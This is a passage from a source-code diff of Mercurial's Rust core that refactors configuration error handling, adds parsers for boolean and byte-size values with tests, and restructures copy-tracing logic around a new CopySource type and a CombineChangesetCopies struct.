(configitems.py) @@ -216,53 +288,32 @@ * Others? */ } -impl ConfigOrigin { - /// TODO use some kind of dedicated trait? 
- pub fn to_bytes(&self) -> Vec<u8> { +impl DisplayBytes for ConfigOrigin { + fn display_bytes( + &self, + out: &mut dyn std::io::Write, + ) -> std::io::Result<()> { match self { - ConfigOrigin::File(p) => get_bytes_from_path(p), - ConfigOrigin::Environment(e) => e.to_owned(), + ConfigOrigin::File(p) => out.write_all(&get_bytes_from_path(p)), + ConfigOrigin::CommandLine => out.write_all(b"--config"), + ConfigOrigin::Environment(e) => write_bytes!(out, b"${}", e), } } } #[derive(Debug)] -pub enum ConfigError { - Parse { - origin: ConfigOrigin, - line: Option<usize>, - bytes: Vec<u8>, - }, - /// Failed to include a sub config file - IncludeError { - path: PathBuf, - io_error: std::io::Error, - }, - /// Any IO error that isn't expected - IO(std::io::Error), +pub struct ConfigParseError { + pub origin: ConfigOrigin, + pub line: Option<usize>, + pub message: Vec<u8>, } -impl From<std::io::Error> for ConfigError { - fn from(e: std::io::Error) -> Self { - Self::IO(e) - } +#[derive(Debug, derive_more::From)] +pub enum ConfigError { + Parse(ConfigParseError), + Other(HgError), } fn make_regex(pattern: &'static str) -> Regex { Regex::new(pattern).expect("expected a valid regex") } - -/// Includes are relative to the file they're defined in, unless they're -/// absolute. -fn read_include( - old_src: &Path, - new_src: &Path, -) -> (PathBuf, io::Result<Vec<u8>>) { - if new_src.is_absolute() { - (new_src.to_path_buf(), read_whole_file(&new_src)) - } else { - let dir = old_src.parent().unwrap(); - let new_src = dir.join(&new_src); - (new_src.to_owned(), read_whole_file(&new_src)) - } -} diff --git a/rust/hg-core/src/config/values.rs b/rust/hg-core/src/config/values.rs new file mode 100644 --- /dev/null +++ b/rust/hg-core/src/config/values.rs @@ -0,0 +1,61 @@ +//! Parsing functions for various type of configuration values. +//! +//! Returning `None` indicates a syntax error. Using a `Result` would be more +//! 
correct but would take more boilerplate for converting between error types, +//! compared to using `.ok()` on inner results of various error types to +//! convert them all to options. The `Config::get_parse` method later converts +//! those options to results with `ConfigValueParseError`, which contains +//! details about where the value came from (but omits details of what’s +//! invalid inside the value). + +pub(super) fn parse_bool(v: &[u8]) -> Option<bool> { + match v.to_ascii_lowercase().as_slice() { + b"1" | b"yes" | b"true" | b"on" | b"always" => Some(true), + b"0" | b"no" | b"false" | b"off" | b"never" => Some(false), + _ => None, + } +} + +pub(super) fn parse_byte_size(value: &[u8]) -> Option<u64> { + let value = std::str::from_utf8(value).ok()?.to_ascii_lowercase(); + const UNITS: &[(&str, u64)] = &[ + ("g", 1 << 30), + ("gb", 1 << 30), + ("m", 1 << 20), + ("mb", 1 << 20), + ("k", 1 << 10), + ("kb", 1 << 10), + ("b", 1 << 0), // Needs to be last + ]; + for &(unit, multiplier) in UNITS { + // TODO: use `value.strip_suffix(unit)` when we require Rust 1.45+ + if value.ends_with(unit) { + let value_before_unit = &value[..value.len() - unit.len()]; + let float: f64 = value_before_unit.trim().parse().ok()?; + if float >= 0.0 { + return Some((float * multiplier as f64).round() as u64); + } else { + return None; + } + } + } + value.parse().ok() +} + +#[test] +fn test_parse_byte_size() { + assert_eq!(parse_byte_size(b""), None); + assert_eq!(parse_byte_size(b"b"), None); + + assert_eq!(parse_byte_size(b"12"), Some(12)); + assert_eq!(parse_byte_size(b"12b"), Some(12)); + assert_eq!(parse_byte_size(b"12 b"), Some(12)); + assert_eq!(parse_byte_size(b"12.1 b"), Some(12)); + assert_eq!(parse_byte_size(b"1.1 K"), Some(1126)); + assert_eq!(parse_byte_size(b"1.1 kB"), Some(1126)); + + assert_eq!(parse_byte_size(b"-12 b"), None); + assert_eq!(parse_byte_size(b"-0.1 b"), None); + assert_eq!(parse_byte_size(b"0.1 b"), Some(0)); + assert_eq!(parse_byte_size(b"12.1 b"), 
Some(12)); +} diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -1,46 +1,121 @@ +#[cfg(test)] +#[macro_use] +mod tests_support; + +#[cfg(test)] +mod tests; + use crate::utils::hg_path::HgPath; use crate::utils::hg_path::HgPathBuf; use crate::Revision; use crate::NULL_REVISION; -use im_rc::ordmap::DiffItem; +use bytes_cast::{unaligned, BytesCast}; use im_rc::ordmap::Entry; use im_rc::ordmap::OrdMap; +use im_rc::OrdSet; use std::cmp::Ordering; use std::collections::HashMap; -use std::convert::TryInto; pub type PathCopies = HashMap<HgPathBuf, HgPathBuf>; type PathToken = usize; -#[derive(Clone, Debug, PartialEq, Copy)] -struct TimeStampedPathCopy { +#[derive(Clone, Debug)] +struct CopySource { /// revision at which the copy information was added rev: Revision, /// the copy source, (Set to None in case of deletion of the associated /// key) path: Option<PathToken>, + /// a set of previous `CopySource.rev` value directly or indirectly + /// overwritten by this one. + overwritten: OrdSet<Revision>, +} + +impl CopySource { + /// create a new CopySource + /// + /// Use this when no previous copy source existed. + fn new(rev: Revision, path: Option<PathToken>) -> Self { + Self { + rev, + path, + overwritten: OrdSet::new(), + } + } + + /// create a new CopySource from merging two others + /// + /// Use this when merging two InternalPathCopies requires active merging of + /// some entries. 
+ fn new_from_merge(rev: Revision, winner: &Self, loser: &Self) -> Self { + let mut overwritten = OrdSet::new(); + overwritten.extend(winner.overwritten.iter().copied()); + overwritten.extend(loser.overwritten.iter().copied()); + overwritten.insert(winner.rev); + overwritten.insert(loser.rev); + Self { + rev, + path: winner.path, + overwritten: overwritten, + } + } + + /// Update the value of a pre-existing CopySource + /// + /// Use this when recording copy information from parent → child edges + fn overwrite(&mut self, rev: Revision, path: Option<PathToken>) { + self.overwritten.insert(self.rev); + self.rev = rev; + self.path = path; + } + + /// Mark pre-existing copy information as "dropped" by a file deletion + /// + /// Use this when recording copy information from parent → child edges + fn mark_delete(&mut self, rev: Revision) { + self.overwritten.insert(self.rev); + self.rev = rev; + self.path = None; + } + + /// Mark pre-existing copy information as "dropped" by a file deletion + /// + /// Use this when recording copy information from parent → child edges + fn mark_delete_with_pair(&mut self, rev: Revision, other: &Self) { + self.overwritten.insert(self.rev); + if other.rev != rev { + self.overwritten.insert(other.rev); + } + self.overwritten.extend(other.overwritten.iter().copied()); + self.rev = rev; + self.path = None; + } + + fn is_overwritten_by(&self, other: &Self) -> bool { + other.overwritten.contains(&self.rev) + } +} + +// For the same "dest", content generated for a given revision will always be +// the same. 
+impl PartialEq for CopySource { + fn eq(&self, other: &Self) -> bool { + #[cfg(debug_assertions)] + { + if self.rev == other.rev { + debug_assert!(self.path == other.path); + debug_assert!(self.overwritten == other.overwritten); + } + } + self.rev == other.rev + } } /// maps CopyDestination to Copy Source (+ a "timestamp" for the operation) -type TimeStampedPathCopies = OrdMap<PathToken, TimeStampedPathCopy>; - -/// hold parent 1, parent 2 and relevant files actions. -pub type RevInfo<'a> = (Revision, Revision, ChangedFiles<'a>); - -/// represent the files affected by a changesets -/// -/// This hold a subset of mercurial.metadata.ChangingFiles as we do not need -/// all the data categories tracked by it. -/// This hold a subset of mercurial.metadata.ChangingFiles as we do not need -/// all the data categories tracked by it. -pub struct ChangedFiles<'a> { - nb_items: u32, - index: &'a [u8], - data: &'a [u8], -} +type InternalPathCopies = OrdMap<PathToken, CopySource>; /// Represent active changes that affect the copy tracing. enum Action<'a> { @@ -51,7 +126,8 @@ Removed(&'a HgPath), /// The parent ? 
children edge introduce copy information between (dest, /// source) - Copied(&'a HgPath, &'a HgPath), + CopiedFromP1(&'a HgPath, &'a HgPath), + CopiedFromP2(&'a HgPath, &'a HgPath), } /// This express the possible "special" case we can get in a merge @@ -67,9 +143,6 @@ Normal, } -type FileChange<'a> = (u8, &'a HgPath, &'a HgPath); - -const EMPTY: &[u8] = b""; const COPY_MASK: u8 = 3; const P1_COPY: u8 = 2; const P2_COPY: u8 = 3; @@ -78,142 +151,94 @@ const MERGED: u8 = 8; const SALVAGED: u8 = 16; -impl<'a> ChangedFiles<'a> { - const INDEX_START: usize = 4; - const ENTRY_SIZE: u32 = 9; - const FILENAME_START: u32 = 1; - const COPY_SOURCE_START: u32 = 5; +#[derive(BytesCast)] +#[repr(C)] +struct ChangedFilesIndexEntry { + flags: u8, - pub fn new(data: &'a [u8]) -> Self { - assert!( - data.len() >= 4, - "data size ({}) is too small to contain the header (4)", - data.len() - ); - let nb_items_raw: [u8; 4] = (&data[0..=3]) - .try_into() - .expect("failed to turn 4 bytes into 4 bytes"); - let nb_items = u32::from_be_bytes(nb_items_raw); + /// Only the end position is stored. The start is at the end of the + /// previous entry. + destination_path_end_position: unaligned::U32Be, - let index_size = (nb_items * Self::ENTRY_SIZE) as usize; - let index_end = Self::INDEX_START + index_size; + source_index_entry_position: unaligned::U32Be, +} + +fn _static_assert_size_of() { + let _ = std::mem::transmute::<ChangedFilesIndexEntry, [u8; 9]>; +} - assert!( - data.len() >= index_end, - "data size ({}) is too small to fit the index_data ({})", - data.len(), - index_end - ); +/// Represents the files affected by a changeset. +/// +/// This holds a subset of `mercurial.metadata.ChangingFiles` as we do not need +/// all the data categories tracked by it. 
+pub struct ChangedFiles<'a> { + index: &'a [ChangedFilesIndexEntry], + paths: &'a [u8], +} - let ret = ChangedFiles { - nb_items, - index: &data[Self::INDEX_START..index_end], - data: &data[index_end..], - }; - let max_data = ret.filename_end(nb_items - 1) as usize; - assert!( - ret.data.len() >= max_data, - "data size ({}) is too small to fit all data ({})", - data.len(), - index_end + max_data - ); - ret +impl<'a> ChangedFiles<'a> { + pub fn new(data: &'a [u8]) -> Self { + let (header, rest) = unaligned::U32Be::from_bytes(data).unwrap(); + let nb_index_entries = header.get() as usize; + let (index, paths) = + ChangedFilesIndexEntry::slice_from_bytes(rest, nb_index_entries) + .unwrap(); + Self { index, paths } } pub fn new_empty() -> Self { ChangedFiles { - nb_items: 0, - index: EMPTY, - data: EMPTY, + index: &[], + paths: &[], } } - /// internal function to return an individual entry at a given index - fn entry(&'a self, idx: u32) -> FileChange<'a> { - if idx >= self.nb_items { - panic!( - "index for entry is higher that the number of file {} >= {}", - idx, self.nb_items - ) - } - let flags = self.flags(idx); - let filename = self.filename(idx); - let copy_idx = self.copy_idx(idx); - let copy_source = self.filename(copy_idx); - (flags, filename, copy_source) - } - - /// internal function to return the filename of the entry at a given index - fn filename(&self, idx: u32) -> &HgPath { - let filename_start; - if idx == 0 { - filename_start = 0; + /// Internal function to return the filename of the entry at a given index + fn path(&self, idx: usize) -> &HgPath { + let start = if idx == 0 { + 0 } else { - filename_start = self.filename_end(idx - 1) - } - let filename_end = self.filename_end(idx); - let filename_start = filename_start as usize; - let filename_end = filename_end as usize; - HgPath::new(&self.data[filename_start..filename_end]) - } - - /// internal function to return the flag field of the entry at a given - /// index - fn flags(&self, idx: u32) -> u8 { 
- let idx = idx as usize; - self.index[idx * (Self::ENTRY_SIZE as usize)] - } - - /// internal function to return the end of a filename part at a given index - fn filename_end(&self, idx: u32) -> u32 { - let start = (idx * Self::ENTRY_SIZE) + Self::FILENAME_START; - let end = (idx * Self::ENTRY_SIZE) + Self::COPY_SOURCE_START; - let start = start as usize; - let end = end as usize; - let raw = (&self.index[start..end]) - .try_into() - .expect("failed to turn 4 bytes into 4 bytes"); - u32::from_be_bytes(raw) - } - - /// internal function to return index of the copy source of the entry at a - /// given index - fn copy_idx(&self, idx: u32) -> u32 { - let start = (idx * Self::ENTRY_SIZE) + Self::COPY_SOURCE_START; - let end = (idx + 1) * Self::ENTRY_SIZE; - let start = start as usize; - let end = end as usize; - let raw = (&self.index[start..end]) - .try_into() - .expect("failed to turn 4 bytes into 4 bytes"); - u32::from_be_bytes(raw) + self.index[idx - 1].destination_path_end_position.get() as usize + }; + let end = self.index[idx].destination_path_end_position.get() as usize; + HgPath::new(&self.paths[start..end]) } /// Return an iterator over all the `Action` in this instance. 
- fn iter_actions(&self, parent: Parent) -> ActionsIterator { - ActionsIterator { - changes: &self, - parent: parent, - current: 0, - } + fn iter_actions(&self) -> impl Iterator<Item = Action> { + self.index.iter().enumerate().flat_map(move |(idx, entry)| { + let path = self.path(idx); + if (entry.flags & ACTION_MASK) == REMOVED { + Some(Action::Removed(path)) + } else if (entry.flags & COPY_MASK) == P1_COPY { + let source_idx = + entry.source_index_entry_position.get() as usize; + Some(Action::CopiedFromP1(path, self.path(source_idx))) + } else if (entry.flags & COPY_MASK) == P2_COPY { + let source_idx = + entry.source_index_entry_position.get() as usize; + Some(Action::CopiedFromP2(path, self.path(source_idx))) + } else { + None + } + }) } /// return the MergeCase value associated with a filename fn get_merge_case(&self, path: &HgPath) -> MergeCase { - if self.nb_items == 0 { + if self.index.is_empty() { return MergeCase::Normal; } let mut low_part = 0; - let mut high_part = self.nb_items; + let mut high_part = self.index.len(); while low_part < high_part { let cursor = (low_part + high_part - 1) / 2; - let (flags, filename, _source) = self.entry(cursor); - match path.cmp(filename) { + match path.cmp(self.path(cursor)) { Ordering::Less => low_part = cursor + 1, Ordering::Greater => high_part = cursor, Ordering::Equal => { - return match flags & ACTION_MASK { + return match self.index[cursor].flags & ACTION_MASK { MERGED => MergeCase::Merged, SALVAGED => MergeCase::Salvaged, _ => MergeCase::Normal, @@ -225,100 +250,6 @@ } } -/// A struct responsible for answering "is X ancestors of Y" quickly -/// -/// The structure will delegate ancestors call to a callback, and cache the -/// result. 
-#[derive(Debug)] -struct AncestorOracle<'a, A: Fn(Revision, Revision) -> bool> { - inner: &'a A, - pairs: HashMap<(Revision, Revision), bool>, -} - -impl<'a, A: Fn(Revision, Revision) -> bool> AncestorOracle<'a, A> { - fn new(func: &'a A) -> Self { - Self { - inner: func, - pairs: HashMap::default(), - } - } - - fn record_overwrite(&mut self, anc: Revision, desc: Revision) { - self.pairs.insert((anc, desc), true); - } - - /// returns `true` if `anc` is an ancestors of `desc`, `false` otherwise - fn is_overwrite(&mut self, anc: Revision, desc: Revision) -> bool { - if anc > desc { - false - } else if anc == desc { - true - } else { - if let Some(b) = self.pairs.get(&(anc, desc)) { - *b - } else { - let b = (self.inner)(anc, desc); - self.pairs.insert((anc, desc), b); - b - } - } - } -} - -struct ActionsIterator<'a> { - changes: &'a ChangedFiles<'a>, - parent: Parent, - current: u32, -} - -impl<'a> Iterator for ActionsIterator<'a> { - type Item = Action<'a>; - - fn next(&mut self) -> Option<Action<'a>> { - let copy_flag = match self.parent { - Parent::FirstParent => P1_COPY, - Parent::SecondParent => P2_COPY, - }; - while self.current < self.changes.nb_items { - let (flags, file, source) = self.changes.entry(self.current); - self.current += 1; - if (flags & ACTION_MASK) == REMOVED { - return Some(Action::Removed(file)); - } - let copy = flags & COPY_MASK; - if copy == copy_flag { - return Some(Action::Copied(file, source)); - } - } - return None; - } -} - -/// A small struct whose purpose is to ensure lifetime of bytes referenced in -/// ChangedFiles -/// -/// It is passed to the RevInfoMaker callback who can assign any necessary -/// content to the `data` attribute. The copy tracing code is responsible for -/// keeping the DataHolder alive at least as long as the ChangedFiles object. -pub struct DataHolder<D> { - /// RevInfoMaker callback should assign data referenced by the - /// ChangedFiles struct it return to this attribute. 
The DataHolder - /// lifetime will be at least as long as the ChangedFiles one. - pub data: Option<D>, -} - -pub type RevInfoMaker<'a, D> = - Box<dyn for<'r> Fn(Revision, &'r mut DataHolder<D>) -> RevInfo<'r> + 'a>; - -/// enum used to carry information about the parent → child currently processed -#[derive(Copy, Clone, Debug)] -enum Parent { - /// The `p1(x) → x` edge - FirstParent, - /// The `p2(x) → x` edge - SecondParent, -} - /// A small "tokenizer" responsible of turning full HgPath into lighter /// PathToken /// @@ -345,123 +276,110 @@ } fn untokenize(&self, token: PathToken) -> &HgPathBuf { - assert!(token < self.path.len(), format!("Unknown token: {}", token)); + assert!(token < self.path.len(), "Unknown token: {}", token); &self.path[token] } } /// Same as mercurial.copies._combine_changeset_copies, but in Rust. -/// -/// Arguments are: -/// -/// revs: all revisions to be considered -/// children: a {parent ? [childrens]} mapping -/// target_rev: the final revision we are combining copies to -/// rev_info(rev): callback to get revision information: -/// * first parent -/// * second parent -/// * ChangedFiles -/// isancestors(low_rev, high_rev): callback to check if a revision is an -/// ancestor of another -pub fn combine_changeset_copies<A: Fn(Revision, Revision) -> bool, D>( - revs: Vec<Revision>, - mut children_count: HashMap<Revision, usize>, - target_rev: Revision, - rev_info: RevInfoMaker<D>, - is_ancestor: &A, -) -> PathCopies { - let mut all_copies = HashMap::new(); - let mut oracle = AncestorOracle::new(is_ancestor); - - let mut path_map = TwoWayPathMap::default(); - - for rev in revs { - let mut d: DataHolder<D> = DataHolder { data: None }; - let (p1, p2, changes) = rev_info(rev, &mut d); +pub struct CombineChangesetCopies { + all_copies: HashMap<Revision, InternalPathCopies>, + path_map: TwoWayPathMap, + children_count: HashMap<Revision, usize>, +} - // We will chain the copies information accumulated for the parent with - // the individual 
copies information the curent revision. Creating a - // new TimeStampedPath for each `rev` → `children` vertex. - let mut copies: Option<TimeStampedPathCopies> = None; - if p1 != NULL_REVISION { - // Retrieve data computed in a previous iteration - let parent_copies = get_and_clean_parent_copies( - &mut all_copies, - &mut children_count, - p1, - ); - if let Some(parent_copies) = parent_copies { - // combine it with data for that revision - let vertex_copies = add_from_changes( - &mut path_map, - &mut oracle, - &parent_copies, - &changes, - Parent::FirstParent, - rev, - ); - // keep that data around for potential later combination - copies = Some(vertex_copies); - } - } - if p2 != NULL_REVISION { - // Retrieve data computed in a previous iteration - let parent_copies = get_and_clean_parent_copies( - &mut all_copies, - &mut children_count, - p2, - ); - if let Some(parent_copies) = parent_copies { - // combine it with data for that revision - let vertex_copies = add_from_changes( - &mut path_map, - &mut oracle, - &parent_copies, - &changes, - Parent::SecondParent, - rev, - ); - - copies = match copies { - None => Some(vertex_copies), - // Merge has two parents needs to combines their copy - // information. - // - // If we got data from both parents, We need to combine - // them. - Some(copies) => Some(merge_copies_dict( - &path_map, - rev, - vertex_copies, - copies, - &changes, - &mut oracle, - )), - }; - } - } - match copies { - Some(copies) => { - all_copies.insert(rev, copies); - } - _ => {} +impl CombineChangesetCopies { + pub fn new(children_count: HashMap<Revision, usize>) -> Self { + Self { + all_copies: HashMap::new(), + path_map: TwoWayPathMap::default(), + children_count, } } - // Drop internal information (like the timestamp) and return the final - // mapping. 
- let tt_result = all_copies - .remove(&target_rev) - .expect("target revision was not processed"); - let mut result = PathCopies::default(); - for (dest, tt_source) in tt_result { - if let Some(path) = tt_source.path { - let path_dest = path_map.untokenize(dest).to_owned(); - let path_path = path_map.untokenize(path).to_owned(); - result.insert(path_dest, path_path); + /// Combined the given `changes` data specific to `rev` with the data + /// previously given for its parents (and transitively, its ancestors). + pub fn add_revision( + &mut self, + rev: Revision, + p1: Revision, + p2: Revision, + changes: ChangedFiles<'_>, + ) { + self.add_revision_inner(rev, p1, p2, changes.iter_actions(), |path| { + changes.get_merge_case(path) + }) + } + + /// Separated out from `add_revsion` so that unit tests can call this + /// without synthetizing a `ChangedFiles` in binary format. + fn add_revision_inner<'a>( + &mut self, + rev: Revision, + p1: Revision, + p2: Revision, + copy_actions: impl Iterator<Item = Action<'a>>, + get_merge_case: impl Fn(&HgPath) -> MergeCase + Copy, + ) { + // Retrieve data computed in a previous iteration + let p1_copies = match p1 { + NULL_REVISION => None, + _ => get_and_clean_parent_copies( + &mut self.all_copies, + &mut self.children_count, + p1, + ), // will be None if the vertex is not to be traversed + }; + let p2_copies = match p2 { + NULL_REVISION => None, + _ => get_and_clean_parent_copies( + &mut self.all_copies, + &mut self.children_count, + p2, + ), // will be None if the vertex is not to be traversed + }; + // combine it with data for that revision + let (p1_copies, p2_copies) = chain_changes( + &mut self.path_map, + p1_copies, + p2_copies, + copy_actions, + rev, + ); + let copies = match (p1_copies, p2_copies) { + (None, None) => None, + (c, None) => c, + (None, c) => c, + (Some(p1_copies), Some(p2_copies)) => Some(merge_copies_dict( + &self.path_map, + rev, + p2_copies, + p1_copies, + get_merge_case, + )), + }; + if let Some(c) = 
copies { + self.all_copies.insert(rev, c); } } - result + + /// Drop intermediate data (such as which revision a copy was from) and + /// return the final mapping. + pub fn finish(mut self, target_rev: Revision) -> PathCopies { + let tt_result = self + .all_copies + .remove(&target_rev) + .expect("target revision was not processed"); + let mut result = PathCopies::default(); + for (dest, tt_source) in tt_result { + if let Some(path) = tt_source.path { + let path_dest = self.path_map.untokenize(dest).to_owned(); + let path_path = self.path_map.untokenize(path).to_owned(); + result.insert(path_dest, path_path); + } + } + result + } } /// fetch previous computed information @@ -471,68 +389,67 @@ /// /// If parent is not part of the set we are expected to walk, return None. fn get_and_clean_parent_copies( - all_copies: &mut HashMap<Revision, TimeStampedPathCopies>, + all_copies: &mut HashMap<Revision, InternalPathCopies>, children_count: &mut HashMap<Revision, usize>, parent_rev: Revision, -) -> Option<TimeStampedPathCopies> { +) -> Option<InternalPathCopies> { let count = children_count.get_mut(&parent_rev)?; *count -= 1; if *count == 0 { match all_copies.remove(&parent_rev) { Some(c) => Some(c), - None => Some(TimeStampedPathCopies::default()), + None => Some(InternalPathCopies::default()), } } else { match all_copies.get(&parent_rev) { Some(c) => Some(c.clone()), - None => Some(TimeStampedPathCopies::default()), + None => Some(InternalPathCopies::default()), } } } /// Combine ChangedFiles with some existing PathCopies information and return /// the result -fn add_from_changes<A: Fn(Revision, Revision) -> bool>( +fn chain_changes<'a>( path_map: &mut TwoWayPathMap, - oracle: &mut AncestorOracle<A>, - base_copies: &TimeStampedPathCopies, - changes: &ChangedFiles, - parent: Parent, + base_p1_copies: Option<InternalPathCopies>, + base_p2_copies: Option<InternalPathCopies>, + copy_actions: impl Iterator<Item = Action<'a>>, current_rev: Revision, -) -> 
TimeStampedPathCopies { - let mut copies = base_copies.clone(); - for action in changes.iter_actions(parent) { +) -> (Option<InternalPathCopies>, Option<InternalPathCopies>) { + // Fast path the "nothing to do" case. + if let (None, None) = (&base_p1_copies, &base_p2_copies) { + return (None, None); + } + + let mut p1_copies = base_p1_copies.clone(); + let mut p2_copies = base_p2_copies.clone(); + for action in copy_actions { match action { - Action::Copied(path_dest, path_source) => { - let dest = path_map.tokenize(path_dest); - let source = path_map.tokenize(path_source); - let entry; - if let Some(v) = base_copies.get(&source) { - entry = match &v.path { - Some(path) => Some((*(path)).to_owned()), - None => Some(source.to_owned()), - } - } else { - entry = Some(source.to_owned()); + Action::CopiedFromP1(path_dest, path_source) => { + match &mut p1_copies { + None => (), // This is not a vertex we should proceed. + Some(copies) => add_one_copy( + current_rev, + path_map, + copies, + base_p1_copies.as_ref().unwrap(), + path_dest, + path_source, + ), } - // Each new entry is introduced by the children, we - // record this information as we will need it to take - // the right decision when merging conflicting copy - // information. See merge_copies_dict for details. - match copies.entry(dest) { - Entry::Vacant(slot) => { - let ttpc = TimeStampedPathCopy { - rev: current_rev, - path: entry, - }; - slot.insert(ttpc); - } - Entry::Occupied(mut slot) => { - let mut ttpc = slot.get_mut(); - oracle.record_overwrite(ttpc.rev, current_rev); - ttpc.rev = current_rev; - ttpc.path = entry; - } + } + Action::CopiedFromP2(path_dest, path_source) => { + match &mut p2_copies { + None => (), // This is not a vertex we should proceed. 
+ Some(copies) => add_one_copy( + current_rev, + path_map, + copies, + base_p2_copies.as_ref().unwrap(), + path_dest, + path_source, + ), } } Action::Removed(deleted_path) => { @@ -540,164 +457,131 @@ // // We need to explicitly record them as dropped to // propagate this information when merging two - // TimeStampedPathCopies object. + // InternalPathCopies object. let deleted = path_map.tokenize(deleted_path); - copies.entry(deleted).and_modify(|old| { - oracle.record_overwrite(old.rev, current_rev); - old.rev = current_rev; - old.path = None; - }); + + let p1_entry = match &mut p1_copies { + None => None, + Some(copies) => match copies.entry(deleted) { + Entry::Occupied(e) => Some(e), + Entry::Vacant(_) => None, + }, + }; + let p2_entry = match &mut p2_copies { + None => None, + Some(copies) => match copies.entry(deleted) { + Entry::Occupied(e) => Some(e), + Entry::Vacant(_) => None, + }, + }; + + match (p1_entry, p2_entry) { + (None, None) => (), + (Some(mut e), None) => { + e.get_mut().mark_delete(current_rev) + } + (None, Some(mut e)) => { + e.get_mut().mark_delete(current_rev) + } + (Some(mut e1), Some(mut e2)) => { + let cs1 = e1.get_mut(); + let cs2 = e2.get(); + if cs1 == cs2 { + cs1.mark_delete(current_rev); + } else { + cs1.mark_delete_with_pair(current_rev, &cs2); + } + e2.insert(cs1.clone()); + } + } } } } - copies + (p1_copies, p2_copies) +} + +// insert one new copy information in an InternalPathCopies +// +// This deal with chaining and overwrite. 
+fn add_one_copy( + current_rev: Revision, + path_map: &mut TwoWayPathMap, + copies: &mut InternalPathCopies, + base_copies: &InternalPathCopies, + path_dest: &HgPath, + path_source: &HgPath, +) { + let dest = path_map.tokenize(path_dest); + let source = path_map.tokenize(path_source); + let entry; + if let Some(v) = base_copies.get(&source) { + entry = match &v.path { + Some(path) => Some((*(path)).to_owned()), + None => Some(source.to_owned()), + } + } else { + entry = Some(source.to_owned()); + } + // Each new entry is introduced by the children, we + // record this information as we will need it to take + // the right decision when merging conflicting copy + // information. See merge_copies_dict for details. + match copies.entry(dest) { + Entry::Vacant(slot) => { + let ttpc = CopySource::new(current_rev, entry); + slot.insert(ttpc); + } + Entry::Occupied(mut slot) => { + let ttpc = slot.get_mut(); + ttpc.overwrite(current_rev, entry); + } + } } /// merge two copies-mapping together, minor and major /// /// In case of conflict, value from "major" will be picked, unless in some /// cases. See inline documentation for details. -fn merge_copies_dict<A: Fn(Revision, Revision) -> bool>( +fn merge_copies_dict( path_map: &TwoWayPathMap, current_merge: Revision, - mut minor: TimeStampedPathCopies, - mut major: TimeStampedPathCopies, - changes: &ChangedFiles, - oracle: &mut AncestorOracle<A>, -) -> TimeStampedPathCopies { - // This closure exist as temporary help while multiple developper are - // actively working on this code. Feel free to re-inline it once this - // code is more settled. 
- let mut cmp_value = - |dest: &PathToken, - src_minor: &TimeStampedPathCopy, - src_major: &TimeStampedPathCopy| { - compare_value( - path_map, - current_merge, - changes, - oracle, - dest, - src_minor, - src_major, - ) - }; - if minor.is_empty() { - major - } else if major.is_empty() { - minor - } else if minor.len() * 2 < major.len() { - // Lets says we are merging two TimeStampedPathCopies instance A and B. - // - // If A contains N items, the merge result will never contains more - // than N values differents than the one in A - // - // If B contains M items, with M > N, the merge result will always - // result in a minimum of M - N value differents than the on in - // A - // - // As a result, if N < (M-N), we know that simply iterating over A will - // yield less difference than iterating over the difference - // between A and B. - // - // This help performance a lot in case were a tiny - // TimeStampedPathCopies is merged with a much larger one. - for (dest, src_minor) in minor { - let src_major = major.get(&dest); - match src_major { - None => major.insert(dest, src_minor), - Some(src_major) => { - match cmp_value(&dest, &src_minor, src_major) { - MergePick::Any | MergePick::Major => None, - MergePick::Minor => major.insert(dest, src_minor), - } - } + minor: InternalPathCopies, + major: InternalPathCopies, + get_merge_case: impl Fn(&HgPath) -> MergeCase + Copy, +) -> InternalPathCopies { + use crate::utils::{ordmap_union_with_merge, MergeResult}; + + ordmap_union_with_merge(minor, major, |&dest, src_minor, src_major| { + let (pick, overwrite) = compare_value( + current_merge, + || get_merge_case(path_map.untokenize(dest)), + src_minor, + src_major, + ); + if overwrite { + let (winner, loser) = match pick { + MergePick::Major | MergePick::Any => (src_major, src_minor), + MergePick::Minor => (src_minor, src_major), }; - } - major - } else if major.len() * 2 < minor.len() { - // This use the same rational than the previous block. 
- // (Check previous block documentation for details.) - for (dest, src_major) in major { - let src_minor = minor.get(&dest); - match src_minor { - None => minor.insert(dest, src_major), - Some(src_minor) => { - match cmp_value(&dest, src_minor, &src_major) { - MergePick::Any | MergePick::Minor => None, - MergePick::Major => minor.insert(dest, src_major), - } + MergeResult::UseNewValue(CopySource::new_from_merge( + current_merge, + winner, + loser, + )) + } else { + match pick { + MergePick::Any | MergePick::Major => { + MergeResult::UseRightValue } - }; - } - minor - } else { - let mut override_minor = Vec::new(); - let mut override_major = Vec::new(); - - let mut to_major = |k: &PathToken, v: &TimeStampedPathCopy| { - override_major.push((k.clone(), v.clone())) - }; - let mut to_minor = |k: &PathToken, v: &TimeStampedPathCopy| { - override_minor.push((k.clone(), v.clone())) - }; - - // The diff function leverage detection of the identical subpart if - // minor and major has some common ancestors. This make it very - // fast is most case. - // - // In case where the two map are vastly different in size, the current - // approach is still slowish because the iteration will iterate over - // all the "exclusive" content of the larger on. This situation can be - // frequent when the subgraph of revision we are processing has a lot - // of roots. Each roots adding they own fully new map to the mix (and - // likely a small map, if the path from the root to the "main path" is - // small. - // - // We could do better by detecting such situation and processing them - // differently. 
- for d in minor.diff(&major) { - match d { - DiffItem::Add(k, v) => to_minor(k, v), - DiffItem::Remove(k, v) => to_major(k, v), - DiffItem::Update { old, new } => { - let (dest, src_major) = new; - let (_, src_minor) = old; - match cmp_value(dest, src_minor, src_major) { - MergePick::Major => to_minor(dest, src_major), - MergePick::Minor => to_major(dest, src_minor), - // If the two entry are identical, no need to do - // anything (but diff should not have yield them) - MergePick::Any => unreachable!(), - } - } - }; - } - - let updates; - let mut result; - if override_major.is_empty() { - result = major - } else if override_minor.is_empty() { - result = minor - } else { - if override_minor.len() < override_major.len() { - updates = override_minor; - result = minor; - } else { - updates = override_major; - result = major; - } - for (k, v) in updates { - result.insert(k, v); + MergePick::Minor => MergeResult::UseLeftValue, } } - result - } + }) } /// represent the side that should prevail when merging two -/// TimeStampedPathCopies +/// InternalPathCopies +#[derive(Debug, PartialEq)] enum MergePick { /// The "major" (p1) side prevails Major, @@ -709,89 +593,88 @@ /// decide which side prevails in case of conflicting values #[allow(clippy::if_same_then_else)] -fn compare_value<A: Fn(Revision, Revision) -> bool>( - path_map: &TwoWayPathMap, +fn compare_value( current_merge: Revision, - changes: &ChangedFiles, - oracle: &mut AncestorOracle<A>, - dest: &PathToken, - src_minor: &TimeStampedPathCopy, - src_major: 